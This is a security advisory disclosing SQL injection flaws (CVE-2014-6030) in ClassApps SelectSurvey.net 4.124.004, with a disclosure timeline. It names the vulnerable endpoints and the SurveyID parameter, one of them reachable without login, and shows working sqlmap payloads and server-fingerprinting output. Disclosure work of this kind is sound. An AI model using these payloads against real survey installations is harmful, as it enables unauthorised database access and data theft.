ClassApps SelectSurvey.net 4.124.004 SQL Injection

`Details  
==========  
Software: ClassApps SelectSurvey.net  
Description: Multiple SQL Injection Vulnerabilities  
Version: 4.124.004  
Homepage: https://www.classapps.com/SelectSurveyNETOverview.asp  
Vendor Fix: 4.125.002  
CVE: 2014-6030  
  
Timeline  
==========  
Aug 28 2014 - Vendor Notified  
Aug 28 2014 - CVE Requested  
Aug 28 2014 - Vendor Response  
Sep 01 2014 - CVE Assigned  
Sep 01 2014 - Upgraded Version Released  
Sep 17 2014 - Disclosure  
  
Description  
==========  
SelectSurvey.net is a web-based survey application written in ASP.net  
and C#. It is vulnerable to multiple SQL injection attacks, both  
authenticated and unauthenticated. The authenticated vulnerability  
resides within the file upload script, as the parameters are not  
sanitized prior to being placed into the SQL query. ClassApps had  
previously listed 'SQL injection protection' as a feature and did have  
several functions in place to attempt to prevent such attacks but due to  
using a "blacklisting" approach, it is possible to circumvent these  
functions. These functions are used elsewhere throughout the application  
to protect GET request variables but are not sufficient. Only this  
specific version of the application has been tested but it is highly  
likely these vulnerabilities exist within prior versions. It has not  
been confirmed that these vulnerabilities are fixed. The vendor stated  
that they would be fixed in this new release however, they do not allow  
download of the code unless you are a customer so fixes have not been  
verified.  
  
Examples  
==========  
/survey/ReviewReadOnlySurvey.aspx?ResponseID=<num>&SurveyID=[SQLi]  
(unauthenticated)  
/survey/UploadImagePopupToDb.aspx?ResponseID=<num>&SurveyID=[SQLi]  
(authenticated)  
  
sqlmap identified the following injection points:  
---  
Place: GET  
Parameter: SurveyID  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: ResponseID=1&SurveyID=1' AND 4002=4002 AND 'dLur'='dLur  
  
Type: stacked queries  
Title: Microsoft SQL Server/Sybase stacked queries  
Payload: ResponseID=1&SurveyID=1'; WAITFOR DELAY '0:0:5'--  
  
Type: AND/OR time-based blind  
Title: Microsoft SQL Server/Sybase time-based blind  
Payload: ResponseID=1&SurveyID=1' WAITFOR DELAY '0:0:5'--  
---  
[14:01:39] [INFO] testing Microsoft SQL Server  
[14:01:39] [INFO] confirming Microsoft SQL Server  
[14:01:39] [INFO] the back-end DBMS is Microsoft SQL Server  
[14:01:39] [INFO] fetching banner  
web server operating system: Windows 2008 R2 or 7  
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5  
back-end DBMS operating system: Windows 7 Service Pack 1  
back-end DBMS: Microsoft SQL Server 2008  
banner:  
---  
Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)  
Jun 28 2012 08:36:30  
Copyright (c) Microsoft Corporation  
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601:  
Service Pack 1)  
---  
  
  
  
  
  
`